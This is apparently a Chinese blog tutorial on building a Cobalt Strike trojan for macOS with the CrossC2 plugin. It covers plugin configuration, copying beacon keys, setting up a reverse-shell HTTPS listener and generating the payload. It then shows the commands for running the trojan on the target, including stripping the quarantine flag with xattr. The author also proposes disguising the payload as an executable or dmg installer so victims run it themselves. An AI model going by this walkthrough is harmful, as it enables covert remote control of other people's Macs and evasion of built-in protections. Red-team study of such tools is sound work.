前言
- 我们知道CS原生只支持Windows上线,那么对于MacOS、Linux我们可以通过CrossC2插件实现上线
- 下载地址:https://github.com/gloxec/CrossC2/releases
- 我这里主要是演示上线MacOS,上线Linux是相同的,参考文章:https://blog.csdn.net/m0_61867082/article/details/131386931
环境
- 客户端是Windows/Linux/Mac均可,只需要下载对应的脚本文件即可:
- 然后CS的版本是4.7、4.8都可以,我们需要准备的文件有:
1. CrossC2-GithubBot-2023-11-20.cna# 插件本身2. genCrossC2.exe# 客户端是哪个就下哪个3. .cobaltstrike.beacon_keys# 从服务器TeamServer中下载到客户端- 注意这里
.cobaltstrike.beacon_keys文件一定要从服务端下载到客户端本地 - CS服务器尽量选用的是Linux,直接启动即可
./teamserver<IP><password>- 接着在客户端先配置
CrossC2-GithubBot-2023-11-20.cna中的$CC2_PATH和$CC2_BIN:
$CC2_PATH="D:/path/CrossC2/";# <-------- fix$CC2_BIN="genCrossC2.exe";- 需要注意的就是:
- 尽量不要包含中文路径(当然可以包含)
$CC2_PATH是绝对路径,最后必须要有/- 然后
$CC2_BIN这个就根据你下载的脚本名称填写即可
木马生成
- 首先创建监听器:
- 然后加载我们的CrossC2插件,选择刚才下载的
.cna文件: - 加载成功之后右上角就会多出
CrossC2的插件: - 这里选择创建反向Shell的HTTPS监听器,根据标注的内容创建即可:
- 点击生成他就会自动调用
genCrossC2.exe创建木马程序,我们可以在事件监听器上看到如下日志: - 如果有红色框标记的地方即生成成功,如果没有可以将这条命令放到cmd/bash上执行一下看看报错
CS上线
- 将生成的木马(只需要mactest即可,不用mactest.lib文件)放到Mac机器上,然后执行如下命令:
# 赋予执行权限chmod+x mactest# 移除文件的隔离标记xattr -cr mactest# 执行该文件./mactest- 成功上线并且正常执行命令,当然在实战当中肯定不可能这么搞,还需要手动执行chmod、xttar这些命令
- 我们进阶的玩法就是可以将这个东西直接弄成可执行程序,或者弄成dmg的安装镜像,让他自己执行这些危险命令
- 这些都是我们之后要考虑的事情了,我这里主要是测试一下能不能上线MacOS
